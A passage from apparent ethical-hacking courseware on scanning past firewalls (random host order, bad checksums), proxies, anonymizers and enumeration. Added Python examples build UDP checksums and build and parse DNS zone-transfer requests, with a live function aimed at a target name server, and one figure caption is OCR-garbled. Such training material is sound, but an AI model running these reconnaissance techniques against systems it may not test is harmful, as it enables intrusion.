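            hits.append((p["src"], p["dst"], len(p["payload"])))
    return hits


# Constructed sample traffic: one clean SYN, two SYNs carrying the payloads the
# text uses as examples, and the server's SYN-ACK (documentation-range addresses).
SAMPLE_PACKETS = [
    {"src": "198.51.100.7", "dst": "203.0.113.10", "flags": {"SYN"}, "payload": b""},
    {"src": "198.51.100.7", "dst": "203.0.113.10", "flags": {"SYN"},
     "payload": parse_data_hex("0xdeadbeef")},
    {"src": "198.51.100.7", "dst": "203.0.113.10", "flags": {"SYN"},
     "payload": b"Ph34r my 133t skills"},
    {"src": "203.0.113.10", "dst": "198.51.100.7", "flags": {"SYN", "ACK"}, "payload": b""},
]

if __name__ == "__main__":
    print(parse_data_hex("\\xCA\\xFE\\x09").hex())
    for hit in syn_probes_with_payload(SAMPLE_PACKETS):
        print("SYN with payload:", hit)
```

One caveat for the detection half: TCP Fast Open (RFC 7413) legitimately places data in a SYN, so on networks where it is in use the check should exclude segments carrying the Fast Open option rather than treat every SYN payload as a crafted probe.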

Figure 3.96: Screenshot of appending random string in Zenmap
Randomizing Host Order and Sending Bad Checksums

- Attackers can scan the number of hosts in the target network in a random order to scan an intended target that is behind a firewall.
- Attackers send packets with bad or bogus TCP/UDP checksums to the intended target to avoid certain firewall rule sets.

Randomizing Host Order and Sending Bad Checksums

Randomizing Host Order

The attacker scans the number of hosts in the target network in a random order to scan the intended target that is lying beyond the firewall. The option used by Nmap to scan with a random host order is --randomize-hosts.

This technique instructs Nmap to shuffle each group of 16384 hosts before scanning with slow timing options, thus making the scan less notable to network monitoring systems and firewalls. If larger group sizes are to be randomized, PING_GROUP_SZ should be increased in nmap.h and it should be compiled again. Another method can be followed by generating the target IP list with the list scan command -sL -n -oN <filename>, randomizing the list with a Perl script, and then providing the whole list to Nmap using the -iL option.

Figure 3.97: Screenshot of randomizing hosts in Zenmap

Sending Bad Checksums

The attacker sends packets with bad or bogus TCP/UDP checksums to the intended target to avoid certain firewall rule sets. TCP/UDP checksums are used to ensure data integrity. Sending packets with incorrect checksums can help attackers to acquire information from improperly configured systems by checking for any response. If there is a response, then it is from the IDS or firewall, which did not verify the obtained checksum. If there is no response or the packets are dropped, then it can be inferred that the system is configured. This technique instructs Nmap to send packets with invalid TCP, UDP, or SCTP checksums to the target host. The option used by Nmap is --badsum.
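The paragraph above turns on whether the receiving system verifies the transport checksum before answering. The following added example, not part of the courseware or of Nmap, builds a UDP datagram with a correct Internet checksum (RFC 768 with the IPv4 pseudo-header, RFC 1071 arithmetic), verifies it the way a correctly configured host does, and models the two behaviours the text describes: a verifying host silently drops the bad datagram, a non-verifying one answers it. The addresses and ports are constructed sample values.

```python
# Added example (not part of the CEH courseware or of Nmap): UDP checksum
# construction and verification, plus a model of a receiver that does or does
# not verify the checksum before answering. Sample values are constructed.
import socket
import struct


def internet_checksum(data: bytes) -> int:
    """RFC 1071 ones'-complement sum of 16-bit big-endian words, complemented."""
    if len(data) % 2:
        data += b"\x00"                      # pad odd-length data with a zero byte
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                       # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def _pseudo_header(src_ip: str, dst_ip: str, udp_len: int) -> bytes:
    """IPv4 pseudo-header covered by the UDP checksum: src, dst, zero, proto 17, length."""
    return socket.inet_aton(src_ip) + socket.inet_aton(dst_ip) + struct.pack("!BBH", 0, 17, udp_len)


def build_udp(src_ip, dst_ip, sport, dport, payload: bytes, checksum=None) -> bytes:
    """Return UDP header + payload. checksum=None computes the correct value; any
    other value is written verbatim, which is what a bad-checksum probe looks like."""
    length = 8 + len(payload)
    if checksum is None:
        header = struct.pack("!HHHH", sport, dport, length, 0)
        checksum = internet_checksum(_pseudo_header(src_ip, dst_ip, length) + header + payload)
        if checksum == 0:
            checksum = 0xFFFF                # zero means "no checksum" in UDP, so send all-ones
    return struct.pack("!HHHH", sport, dport, length, checksum) + payload


def udp_checksum_valid(src_ip: str, dst_ip: str, datagram: bytes) -> bool:
    """True when the checksum verifies. A zero field means the sender computed none,
    which UDP over IPv4 permits, so it is accepted here."""
    _sport, _dport, length, chk = struct.unpack("!HHHH", datagram[:8])
    if chk == 0:
        return True
    if length != len(datagram):
        return False
    # With a correct checksum in place the complemented sum over everything is 0.
    return internet_checksum(_pseudo_header(src_ip, dst_ip, length) + datagram) == 0


def receiver_response(src_ip, dst_ip, datagram: bytes, verifies_checksum: bool = True) -> str:
    """Model of the two behaviours in the text: a host or middlebox that verifies the
    checksum silently drops a bad datagram; one that does not verify answers it."""
    if verifies_checksum and not udp_checksum_valid(src_ip, dst_ip, datagram):
        return "dropped"
    return "answered"


if __name__ == "__main__":
    good = build_udp("10.0.0.5", "10.0.0.9", 40000, 53, b"hello")
    bad = good[:6] + bytes([good[6] ^ 0x80]) + good[7:]   # flip one checksum bit
    print("good verifies:", udp_checksum_valid("10.0.0.5", "10.0.0.9", good))
    print("bad, verifying host:", receiver_response("10.0.0.5", "10.0.0.9", bad))
    print("bad, non-verifying host:", receiver_response("10.0.0.5", "10.0.0.9", bad, False))
```

From the defender's side the useful signal is the asymmetry the text points out: a stack that answers datagrams whose checksum does not verify is the one worth investigating, and a capture tool on the host can confirm the bad checksums directly.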

Figure 3.98: Screenshot of scanning by sending bad checksums in Zenmap
Proxy Servers

- A proxy server is an application that can serve as an intermediary for connecting with other computers.
- Why attackers use proxy servers: to mask the actual source of an attack by impersonating a fake source address of the proxy, and to interrupt all the requests sent by a user and transmit them to a third destination.
- Note: A search in Google will list thousands of free proxy servers.
Proxy Servers

A proxy server is an application that can serve as an intermediary for connecting with other computers. A proxy server is used:

- As a firewall and to protect the local network from external attacks.
- As an IP address multiplexer that allows several computers to connect to the Internet when you have only one IP address (NAT/PAT).
- To anonymize web surfing (to some extent).
- To extract unwanted content, such as ads or "unsuitable" material (using specialized proxy servers).
- To provide some protection against hacking attacks.
- To save bandwidth.

How does a proxy server work?

Initially, when you use a proxy to request a particular web page on an actual server, the proxy server receives it. The proxy server then sends your request to the actual server on your behalf. It mediates between you and the actual server to transmit and respond to the request, as shown in the figure below.

Figure 3.99: Attacker using a proxy server for connecting to the target

In this process, the proxy receives the communication between the client and the destination application. To take advantage of a proxy server, an attacker must configure client programs so that they can send their requests to the proxy server instead of the final destination.
Why Attackers Use Proxy Servers?

It is easier for an attacker to attack or hack a particular system than to conceal the attack source. Therefore, the primary challenge for an attacker is to hide his/her identity so that he/she cannot be traced. Thus, the attacker uses a proxy server to avoid attack detection by masking his/her IP address. When the attacker uses a proxy to connect to the target system, the server logs will record the proxy's source address rather than the attacker's source address. Proxy sites help the attacker to browse the Internet anonymously and access blocked sites (i.e., evade firewall restrictions). Thus, the attacker can surf restricted sites anonymously without using the source IP address.

Attackers use proxy servers:

- To hide the actual source of a scan and evade certain IDS/firewall restrictions.
- To hide the source IP address so that they can hack without any legal corollary.
- To mask the actual source of the attack by employing a fake source address of the proxy.
- To remotely access intranets and other website resources that are normally off limits.
- To interrupt all the requests sent by a user and transmit them to a third destination; hence, victims will only be able to identify the proxy server address.
- To chain multiple proxy servers to avoid detection.
Free Proxy Servers

Some free proxy servers are available on the Internet, which can help you to access restricted sites without revealing your IP address. In the Google search engine, type "Free Proxy Servers" to see a list of such servers. Select one from this list and download and install it to browse anonymously without revealing your legitimate IP address.

Figure 3.100: Free Proxy Servers
Proxy Chaining

- The user requests a resource from the destination.
- A proxy client at the user's system connects to a proxy server and passes the request to it.
- The proxy server strips the user's identification information and passes the request to the next proxy server.
- This process is repeated by all the proxy servers in the chain.
- At the end, the unencrypted web request is passed to the web server.
Proxy Chaining

Proxy chaining helps an attacker to increase his/her Internet anonymity. Internet anonymity depends on the number of proxies used for fetching the target application; the larger the number of proxy servers used, the greater is the attacker's anonymity. The proxy chaining process is described below:

- The user requests a resource from the destination.
- A proxy client in the user's system connects to a proxy server and passes the request to the proxy server.
- The proxy server strips the user's identification information and passes the request to the next proxy server.
- This process is repeated by all the proxy servers in the chain.
- Finally, the unencrypted request is passed to the web server.

Figure 3.101: Proxy Chaining
Proxy Tools

- Proxy Switcher allows you to surf anonymously on the Internet without disclosing your IP address.
- CyberGhost VPN hides the attacker's IP and replaces it with a selected IP, thereby allowing him or her to surf anonymously.
Proxy Tools

Proxy tools are intended to allow users to surf the Internet anonymously by keeping their IP hidden through a chain of SOCKS or HTTP proxies. These tools can also act as HTTP, HTTPS, mail, FTP, SOCKS, news, and telnet proxy servers.

Proxy Switcher

Source: http://www.proxyswitcher.com

Proxy Switcher allows attackers to surf the Internet anonymously without disclosing their IP address. It also helps attackers to access various blocked sites in the organization. In addition, it avoids all sorts of limitations imposed by target sites.

Figure 3.102: Screenshot of Proxy Switcher

CyberGhost VPN

Source: https://www.cyberghostvpn.com

CyberGhost VPN hides the attacker's IP and replaces it with a selected IP, allowing him or her to surf anonymously and access blocked or censored content. It encrypts the connection and does not keep logs, thus securing data.

Figure 3.103: Screenshot of CyberGhost
In addition to the proxy tools mentioned above, there are many other proxy tools intended to allow users to surf the Internet anonymously. Some additional proxy tools are listed below:

- Burp Suite (https://www.portswigger.net)
- Tor (https://www.torproject.org)
- CCProxy (https://www.youngzsoft.net)
- Hotspot Shield (https://www.hotspotshield.com)

Proxy Tools for Mobile

Shadowsocks

Source: https://shadowsocks.org

Shadowsocks is a high-performance, cross-platform secured socks5 proxy. It adopts bleeding-edge techniques with asynchronous I/O and event-driven programming. This tool is available on multiple platforms, including PC, MAC, mobile devices (Android and iOS), and routers (OpenWRT). It is a low-resource-consumption tool that is suitable for low-end boxes and embedded devices. It supports open-source implementations in python, node.js, golang, C#, and pure C. Shadowsocks helps attackers to surf the Internet privately and securely.

Figure 3.104: Screenshot of Shadowsocks
ProxyDroid

Source: https://github.com

ProxyDroid is an app that can help you to set the proxy (http/socks4/socks5) on your Android devices. It supports HTTP/HTTPS/SOCKS4/SOCKS5 proxy and also supports basic/NTLM/NTLMv2 authentication methods. Attackers can use this tool as a DNS proxy to access IP addresses that are beyond the firewalls.
Figure 3.105: Screenshot of ProxyDroid
Proxy Manager

Source: https://play.google.com

Proxy Manager is another Android-based HTTP/SOCKS4/SOCKS5 proxy tool that supports proxy and user authentication. It enables attackers to surf the Internet anonymously.
Figure 3.106: Screenshot of Proxy Manager
Anonymizers

- An anonymizer removes all identity information from the user's computer while the user surfs the Internet.
- Anonymizers make activity on the Internet untraceable.
- Anonymizers allow you to bypass Internet censors.

Why use an Anonymizer?

- Privacy and anonymity
- Protection against online attacks
- Access to restricted content
Anonymizers

An anonymizer is an intermediate server placed between you as the end user and the website to access the website on your behalf and make your web surfing activities untraceable. Anonymizers allow you to bypass Internet censors. An anonymizer eliminates all the identifying information (IP address) from your system while you are surfing the Internet, thereby ensuring privacy. Most anonymizers can anonymize the web (HTTP:), file transfer protocol (FTP:), and gopher (gopher:) Internet services.

To visit a page anonymously, you can visit your preferred anonymizer site and enter the name of the target website in the anonymization field. Alternatively, you can set your browser home page to point to an anonymizer to anonymize subsequent web access. In addition, you can choose to anonymously provide passwords and other information to sites without revealing any additional information, such as your IP address. Attackers may configure an anonymizer as a permanent proxy server by making the site name the setting for the HTTP, FTP, Gopher, and other proxy options in their application configuration menu, thereby cloaking their malicious activities.
Why Use an Anonymizer?

The reasons for using anonymizers include:

- Ensuring privacy: Protect your identity by making your web navigation activities untraceable. Your privacy is maintained until and unless you disclose your personal information on the web, for example, by filling out forms.
- Accessing government-restricted content: Most governments prevent their citizens from accessing certain websites or content deemed inappropriate or sensitive. However, these sites can still be accessed using an anonymizer located outside the target country.

- Protection against online attacks: An anonymizer can protect you from all instances of online pharming attacks by routing all customer Internet traffic via its protected DNS server.
- Bypassing IDS and firewall rules: Firewalls are typically bypassed by employees or students accessing websites that they are not supposed to access. An anonymizer service gets around your organization's firewall by setting up a connection between your computer and the anonymizer service. Thus, firewalls see only the connection from your computer to the anonymizer's web address. The anonymizer will subsequently connect to any website (e.g., Twitter) with the help of an Internet connection and then direct the content back to you. To your organization, your system appears to be simply connected to the anonymizer's web address but not to the actual site that you are browsing.

In addition to protecting users' identities, anonymizers can also be used to attack a website without being traced.
Types of Anonymizers

An anonymizer is a service through which one can hide one's identity when using certain Internet services. It encrypts the data from your computer to the Internet service provider. Anonymizers are of two basic types: networked anonymizers and single-point anonymizers.
Networked Anonymizers

A networked anonymizer first transfers your information through a network of Internet-connected computers before passing it on to the website. Because information passes through several Internet computers, it becomes cumbersome for anyone trying to track your information to establish the connection between you and the anonymizer.

Example: If you want to visit any web page, you have to make a request. The request will first pass through A, B, and C Internet computers before going to the website.

Advantage: Complication of the communications makes traffic analysis complex.

Disadvantage: Any multi-node network communication incurs some degree of risk of compromising confidentiality at each node.
Single-Point Anonymizers

Single-point anonymizers first transfer your information through a website before sending it to the target website and then pass back the information gathered from the target website to you via the website to protect your identity.

Advantage: Arms-length communication hides the IP address and related identifying information.

Disadvantage: It offers less resistance to sophisticated traffic analysis.

Censorship Circumvention Tools: Alkasir and Tails
Censorship Circumvention Tools

Alkasir

Source: https://github.com

Alkasir is a cross-platform, open-source, and robust website censorship circumvention tool that also maps censorship patterns around the world. Alkasir enables attackers to identify censored links. It keeps them informed about links that are still blocked and links that are not blocked.

Figure 3.107: Screenshot of Alkasir
Tails

Source: https://tails.boum.org

Tails is a live OS that users can run on any computer from a DVD drive, USB stick, or SD card. It uses state-of-the-art cryptographic tools to encrypt files, emails, and instant messaging. It allows attackers to use the Internet anonymously and circumvent censorship. It leaves no trace on the computer.

Figure 3.108: Screenshot of Tails
Anonymizers: Whonix and Psiphon

- Whonix is a desktop OS designed for advanced security and privacy.
- Psiphon is an open-source anonymizer software that allows attackers to surf the Internet through a secure proxy.
Anonymizers

An anonymizer helps you to mask your IP address so that you can visit websites without being tracked or identified while keeping your activity and identity protected. It uses various techniques such as SSH, VPN, and HTTP proxies, which allow you to access blocked or censored content on the Internet with omitted advertisements.

Whonix

Source: https://www.whonix.org

Whonix is a desktop OS designed for advanced security and privacy. It mitigates the threat of common attack vectors while maintaining usability. Online anonymity is realized via fail-safe, automatic, and desktop-wide use of the Tor network. It consists of a heavily reconfigured Debian base that is run inside multiple virtual machines, providing a substantial layer of protection from malware and IP address leaks.

Figure 3.109: Screenshot of Whonix
Psiphon

Source: https://psiphon.ca

Psiphon is an open-source anonymizer software that allows attackers to surf the Internet through a secure proxy. After installation, it will automatically configure the Windows machine's proxy configurations in such a way that the network traffic for the web browsers and applications that operate through these configurations will be tunneled through Psiphon.
Figure: Screenshot of Psiphon

Anonymizers for Mobile
Orbot

Source: https://guardianproject.info

Orbot is a proxy app that allows other apps to use the Internet more securely. It uses Tor to encrypt Internet traffic and then hides it by bouncing through a series of computers around the world. Tor is a free software that provides an open network to help defend your system against any form of network surveillance that may compromise personal freedom and privacy as well as confidential business activities and relationships through a type of state security monitoring known as "traffic analysis." Orbot creates a truly private Internet connection.

Psiphon

Source: https://psiphon.ca

Psiphon is a circumvention tool developed by Psiphon, Inc., which uses VPN, SSH, and HTTP proxy technology to provide you with open and uncensored access to Internet content. However, Psiphon does not increase online privacy and is not an online security tool.

Features:

- Browser or VPN (whole-device) mode: one can choose whether to tunnel everything or just the web browser.
- In-app stats: This lets you know how much traffic you have been using.
Figure 3.112: Screenshot of Psiphon

OpenDoor

Source: https://www.apple.com

OpenDoor is an app designed for both iPhone and iPad; it allows attackers to browse websites smoothly and anonymously.

Figure
3.113
of ScreenshotOpenDaoe

ical andCountermensores
Mackin ©by E-Comel
Copyright
Module Flow: Network Scanning Concepts | Scanning Tools | Port and Service Discovery | OS Discovery (Banner Grabbing/OS Fingerprinting) | Scanning Beyond IDS and Firewall | Draw Network Diagrams

Draw Network Diagrams

A network diagram helps in analyzing the complete network topology. This section highlights the importance of network diagrams, how to draw them, how an attacker uses them to launch an attack, and the tools used for drawing them.

Drawing Network Diagrams
▪ A diagram of a target network provides an attacker with valuable information about the target network and its architecture
▪ Network diagrams show logical or physical paths to a potential target
Drawing a network diagram helps an attacker to identify the topology or architecture of a target network. The network diagram also helps to trace the path to the target host in the network and enables the attacker to understand the positions of firewalls, IDS, routers, and other access control devices. Once the attacker has this information, he/she can try to find the vulnerabilities or weak points in these security mechanisms. Then, the attacker can exploit these weaknesses to find his/her way into the victim's network.

Network administrators use network discovery or mapping tools to draw network diagrams to manage their networks. Attackers use the same tools to draw network diagrams of target networks. An example of a network diagram is shown below.

Figure 3.114: Example of a Network Diagram
Network Discovery and Mapping Tools
Network discovery and mapping tools allow you to view the map of your network. They help you to detect rogue hardware and software violations and notify you whenever a particular host becomes active or goes down. Thus, you can also determine server outages or problems related to performance. An attacker can use the same tools to draw a diagram of the target network, analyze the topology, find the vulnerabilities or weak points, and launch an attack by exploiting these weak points.

▪ Network Topology Mapper
Source: https://www.solarwinds.com
The Network Topology Mapper tool allows one to automatically discover and create a network map of the target network. It can also display in-depth connections such as OSI Layer 2 and Layer 3 topology data (e.g., switch-to-switch, switch-to-node, and switch-to-router connections). It can keep track of network changes and allow the user to perform inventory management of hardware and software assets.
Features:
o Network topology discovery and mapping
Automatically discovers the entire network and creates comprehensive and detailed network maps
o Export network diagrams
Exports network diagrams to Microsoft Office® Visio®, PDF, and PNG formats, and to Orion Network Atlas
o Network mapping for regulatory compliance
Allows one to directly address PCI compliance and other regulations that require maintenance of an up-to-date network diagram
o Multi-level network discovery
Performs multi-level network discovery to produce an integrated OSI Layer 2 and Layer 3 network map that includes detailed device information
o Auto-detection of changes to network topology
Automatically detects new devices and changes to network topology with scheduled network scanning

Figure 3.115: Screenshot of SolarWinds Network Topology Mapper

Some network discovery and mapping tools that an attacker can use to create a network map are listed below:
▪ OpManager (https://www.manageengine.com)
▪ The Dude (https://www.mikrotik.com)
▪ NetSurveyor (http://nutsaboutnets.com)
▪ NetBrain (https://www.netbraintech.com)
▪ Spiceworks Network Mapping Tool (https://www.spiceworks.com)
Network Discovery Tools for Mobile
Some network discovery tools for mobile devices are as follows:
▪ Scany
Source: http://happymagenta.com
Scany, a network scanner app for iPhone and iPad, scans LAN, Wi-Fi networks, websites, and open ports, discovers network devices, and digs network info. It supports several networking protocols and anti-stealth networking technologies. It is a multifunctional instrument for finding connected devices, looking up detailed device information, network troubleshooting, scanning ports, and testing network security and firewalls. Attackers use this tool to scan both the LAN and the Internet, scan any IP address or network range, perform hostname, device name, MAC address, and hardware vendor lookups, ping/trace hosts with integrated tools, and WHOIS hostnames, IP addresses, ASNs, etc.

Figure 3.116: Screenshot of Scany
▪ Network Analyzer
Source: https://play.google.com
Network Analyzer can diagnose various problems in the Wi-Fi network setup or Internet connectivity, and it can also detect various issues in remote servers based on its wide range of in-built tools. Attackers can use it to perform ping, traceroute, port scanning, Whois, and DNS lookup activities.

Figure 3.117: Screenshot of Network Analyzer
▪ PortDroid Network Analysis
Source: https://play.google.com
Attackers can use PortDroid Network Analysis to perform local network discovery. It is also effective in analyzing the network and performing port scanning as well as banner grabbing using certain protocols, including ssh, telnet, http, https, ftp, smb, etc.

Figure 3.118: Screenshot of PortDroid Network Analysis
Module Summary
This module discussed how attackers determine live hosts from a range of IP addresses by sending various ping scan requests to multiple hosts. It also described how attackers perform different scanning techniques to determine open ports, services, service versions, etc., on the target system. Furthermore, it explained how attackers perform banner grabbing or OS fingerprinting to determine the OS running on a remote target system. It also illustrated various scanning techniques that attackers can adopt to bypass IDS/firewall rules and logging mechanisms and hide themselves as usual under the target's network traffic. Finally, it ended with a detailed discussion on drawing the target's network diagram and its significance in providing valuable information about the network and its architecture to an attacker.

In the next module, we will discuss in detail how attackers as well as ethical hackers and pen testers perform enumeration to collect information about a target before an attack or audit.
Module 04: Enumeration

Module Objectives
In the previous modules, you learned about footprinting and network scanning. This module covers the next phase, enumeration. We start with an introduction to enumeration concepts. Subsequently, the module provides insight into different techniques for Network Basic Input/Output System (NetBIOS), Simple Network Management Protocol (SNMP), Lightweight Directory Access Protocol (LDAP), Network Time Protocol (NTP), Network File System (NFS), Simple Mail Transfer Protocol (SMTP), Domain Name System (DNS), Internet Protocol Security (IPsec), Voice over Internet Protocol (VoIP), remote procedure call (RPC), Linux/Unix, Telnet, File Transfer Protocol (FTP), Trivial FTP (TFTP), Server Message Block (SMB), Internet Protocol version 6 (IPv6), and Border Gateway Protocol (BGP) enumeration. The module ends with an overview of enumeration countermeasures.

At the end of this module, you will be able to:
▪ Describe enumeration concepts
▪ Explain different techniques for NetBIOS enumeration
▪ Explain different techniques for SNMP enumeration
▪ Explain different techniques for LDAP enumeration
▪ Explain different techniques for NTP enumeration
▪ Explain different techniques for NFS enumeration
▪ Explain different techniques for SMTP and DNS enumeration
▪ Explain other enumeration techniques such as IPsec, VoIP, RPC, Linux/Unix, Telnet, FTP, TFTP, SMB, IPv6, and BGP enumeration
▪ Apply enumeration countermeasures
Module Flow: NetBIOS Enumeration | LDAP Enumeration | SMTP and DNS Enumeration | Enumeration Countermeasures

Enumeration Concepts
In the enumeration phase, attackers enumerate usernames and other information on the groups, network shares, and services of networked computers. This information helps the attackers identify vulnerabilities in the target network and exploit them to hack the system.

Different sections of this module deal with the enumeration of different services and ports. Before discussing the actual enumeration process, we introduce concepts related to enumeration.
What is Enumeration?
Enumeration is the process of extracting usernames, machine names, network resources, shares, and services from a system or network. In the enumeration phase, an attacker creates active connections with the system and sends directed queries to gain more information about the target. The attacker uses the information collected using enumeration to identify vulnerabilities in the system security, which help them exploit the target system. In turn, enumeration allows the attacker to perform password attacks to gain unauthorized access to information system resources. Enumeration techniques work in an intranet environment.

In particular, enumeration allows the attacker to collect the following information:
▪ Network resources
▪ Network shares
▪ Routing tables
▪ Audit and service settings
▪ SNMP and fully qualified domain name (FQDN) details
▪ Machine names
▪ Users and groups
▪ Applications and banners

During enumeration, attackers may stumble upon a remote inter-process communication (IPC) share, such as IPC$ in Windows, which they can probe further to connect to an administrative share by brute-forcing admin credentials and obtain complete information about the file-system listing that the share represents.

The previous modules highlighted how attackers gather necessary information about a target without any illegal activity. However, enumeration activities may be illegal depending on the organization's policies and the laws that are in effect. An ethical hacker or pen tester should always acquire proper authorization before performing enumeration.
Techniques for Enumeration
The following techniques are used to extract information about a target.
▪ Extract usernames using email IDs
Every email address contains two parts, a username and a domain name, in the format "username@domainname."
▪ Extract information using default passwords
Many online resources provide a list of default passwords assigned by manufacturers to their products. Users often ignore recommendations to change the default usernames and passwords provided by the manufacturer or developer of a product. This eases an attacker's task of enumerating and exploiting the target system.
▪ Brute force Active Directory
Microsoft Active Directory is susceptible to username enumeration at the time of user-supplied input verification. This is a design error in the Microsoft Active Directory implementation. If a user enables the "logon hours" feature, then all the attempts at service authentication result in different error messages. Attackers take advantage of this to enumerate valid usernames. An attacker who succeeds in extracting valid usernames can conduct a brute-force attack to crack the respective passwords.
▪ Extract information using DNS Zone Transfer
A network administrator can use DNS zone transfer to replicate DNS data across several DNS servers or backup DNS files. For this purpose, the administrator needs to execute a zone-transfer request to the name server. If the name server permits zone transfer, it will convert all the DNS names and IP addresses hosted by that server to ASCII text.
If the network administrators did not configure the DNS server properly, the DNS zone transfer can be an effective method to obtain information about the organization's network. This information may include lists of all named hosts, sub-zones, and related IP addresses. A user can perform DNS zone transfer using the nslookup and dig commands.
▪ Extract user groups from Windows
To extract user groups from Windows, the attacker should have a registered ID as a user in the Active Directory. The attacker can then extract information from groups in which the user is a member by using the Windows interface or command-line method.
▪ Extract usernames using SNMP
Attackers can easily guess read-only or read-write community strings by using the SNMP application programming interface (API) to extract usernames.
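The zone-transfer request described above, as an added example that is not part of the courseware: the code builds the same AXFR query over TCP port 53 that dig and nslookup send, parses the reply (including compressed names), and turns the answer into the list of named hosts and IP addresses an attacker is after. A refusal is reported through the RCODE. The zone example.test, the hosts ns1 and www, the addresses 10.0.0.53 and 10.0.0.80, and the serial number are constructed sample data, and sample_axfr_reply() only fakes what a server that allows transfers to anyone would return so the parser can run offline.

```python
# Added example (not from the CEH courseware): build a DNS AXFR request and parse
# the reply, the exchange that "dig axfr" / "nslookup ls -d" perform under the hood.
import socket
import struct

TYPE_A, TYPE_NS, TYPE_SOA, TYPE_AXFR, CLASS_IN = 1, 2, 6, 252, 1
TYPE_NAMES = {TYPE_A: "A", TYPE_NS: "NS", TYPE_SOA: "SOA"}


def encode_name(name):
    """'ns1.example.test' -> b'\\x03ns1\\x07example\\x04test\\x00'."""
    out = b"".join(bytes([len(lbl)]) + lbl.encode("ascii") for lbl in name.rstrip(".").split("."))
    return out + b"\x00"


def build_axfr_query(zone, txid=0x0BAD):
    """AXFR travels over TCP 53: a 2-byte length prefix, then a DNS message with
    flags 0x0000 (query, no recursion) and a single question of type AXFR."""
    msg = struct.pack(">HHHHHH", txid, 0, 1, 0, 0, 0)
    msg += encode_name(zone) + struct.pack(">HH", TYPE_AXFR, CLASS_IN)
    return struct.pack(">H", len(msg)) + msg


def decode_name(msg, off):
    """Decode a possibly compressed name; return (name, offset after it)."""
    labels, end, jumped = [], off, False
    while True:
        length = msg[off]
        if length & 0xC0 == 0xC0:                       # compression pointer
            if not jumped:
                end = off + 2
            off, jumped = struct.unpack(">H", msg[off:off + 2])[0] & 0x3FFF, True
            continue
        off += 1
        if length == 0:
            return ".".join(labels), (end if jumped else off)
        labels.append(msg[off:off + length].decode("ascii"))
        off += length


def parse_axfr_reply(msg):
    """Return [(owner, type, value)] for one AXFR response message.
    A refusal shows up as a non-zero RCODE (5 = REFUSED) with no answers."""
    txid, flags, qd, an, ns, ar = struct.unpack(">HHHHHH", msg[:12])
    if flags & 0x000F:
        raise ValueError("zone transfer refused, RCODE %d" % (flags & 0x000F))
    off = 12
    for _ in range(qd):                                  # skip the echoed question
        _, off = decode_name(msg, off)
        off += 4
    records = []
    for _ in range(an):
        owner, off = decode_name(msg, off)
        rtype, _rclass, _ttl, rdlen = struct.unpack(">HHIH", msg[off:off + 10])
        off, start = off + 10, off + 10
        if rtype == TYPE_A:
            value = ".".join(str(b) for b in msg[start:start + 4])
        elif rtype == TYPE_NS:
            value, _ = decode_name(msg, start)
        elif rtype == TYPE_SOA:
            mname, o = decode_name(msg, start)
            rname, o = decode_name(msg, o)
            value = "%s %s serial=%d" % (mname, rname, struct.unpack(">I", msg[o:o + 4])[0])
        else:
            value = msg[start:start + rdlen].hex()
        records.append((owner, TYPE_NAMES.get(rtype, str(rtype)), value))
        off += rdlen
    return records


def hosts_from_records(records):
    """The 'list of all named hosts and related IP addresses' from the text."""
    return sorted({(owner, value) for owner, rtype, value in records if rtype == "A"})


def zone_transfer(server, zone, timeout=5.0):
    """Live AXFR against a name server (needs network access). Large zones arrive
    as several messages; this reads only the first one."""
    with socket.create_connection((server, 53), timeout=timeout) as s:
        s.sendall(build_axfr_query(zone))
        need = struct.unpack(">H", s.recv(2))[0]
        body = b""
        while len(body) < need:
            chunk = s.recv(need - len(body))
            if not chunk:
                break
            body += chunk
    return parse_axfr_reply(body)


def sample_axfr_reply(txid=0x0BAD):
    """Constructed reply for the made-up zone example.test (sample data only)."""
    zone_ptr = struct.pack(">H", 0xC000 | 12)           # pointer to the question name
    msg = struct.pack(">HHHHHH", txid, 0x8400, 1, 4, 0, 0)
    msg += encode_name("example.test") + struct.pack(">HH", TYPE_AXFR, CLASS_IN)
    soa = b"\x03ns1" + zone_ptr + b"\x0ahostmaster" + zone_ptr
    soa += struct.pack(">IIIII", 2020010101, 3600, 900, 604800, 86400)
    soa_rr = zone_ptr + struct.pack(">HHIH", TYPE_SOA, CLASS_IN, 3600, len(soa)) + soa
    msg += soa_rr
    for host, ip in ((b"\x03ns1", (10, 0, 0, 53)), (b"\x03www", (10, 0, 0, 80))):
        msg += host + zone_ptr + struct.pack(">HHIH", TYPE_A, CLASS_IN, 3600, 4) + bytes(ip)
    return msg + soa_rr                                  # a transfer ends with the SOA again
```

Against a live target, zone_transfer("ns1.target.tld", "target.tld") performs the same request; a correctly configured server answers with RCODE 5 (REFUSED), which is what the countermeasure of restricting zone transfers to known secondaries looks like on the wire.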
Services and Ports to Enumerate
Transmission Control Protocol (TCP) and User Datagram Protocol (UDP) manage data communications between terminals in a network.

TCP is a connection-oriented protocol capable of carrying messages or emails over the Internet. It provides a reliable multi-process communication service in a multi-network environment. The features and functions of TCP include the following:
▪ Supports acknowledgement for data received through a sliding window acknowledgement system
▪ Offers automatic retransmission of lost or unacknowledged data
▪ Allows addressing and multiplexing of data
▪ A connection can be established, managed, or terminated
▪ Offers quality-of-service transmission
▪ Offers congestion management and flow control

UDP is a connectionless protocol that carries short messages over a computer network. It provides unreliable service. The applications of UDP include the following:
▪ Audio streaming
▪ Video conferencing and teleconferencing

Services and TCP/UDP ports that can be enumerated include the following.

▪ TCP/UDP 53: DNS Zone Transfer
The DNS resolution process establishes communication between DNS clients and DNS servers. DNS clients send DNS messages to DNS servers listening on UDP port 53. If the DNS message size exceeds the default size of UDP (512 octets), the response contains only the data that UDP can accommodate, and the DNS server sets a flag to indicate the truncated response. The DNS client can now resend the request via TCP over port 53 to the server. In this approach, the DNS server uses UDP as a default protocol. In the case of lengthy queries for which UDP fails, TCP is used as a failover solution. Malware such as the ADM worm and the Bonk Trojan uses port 53 to exploit vulnerabilities within DNS servers, helping intruders launch attacks.
▪ TCP/UDP 135: Microsoft RPC Endpoint Mapper
Source: https://technet.microsoft.com
RPC is a protocol used by a client system to request a service from a server. An endpoint is the protocol port on which the server listens for the client's RPCs. The RPC Endpoint Mapper enables RPC clients to determine the port number currently assigned to a specific RPC service. There is a flaw in the part of RPC that exchanges messages over TCP/IP. The incorrect handling of malformed messages causes failure. This affects the RPC Endpoint Mapper, which listens on TCP/IP port 135. This vulnerability could allow an attacker to send RPC messages to the RPC Endpoint Mapper process on a server to launch a denial-of-service (DoS) attack.
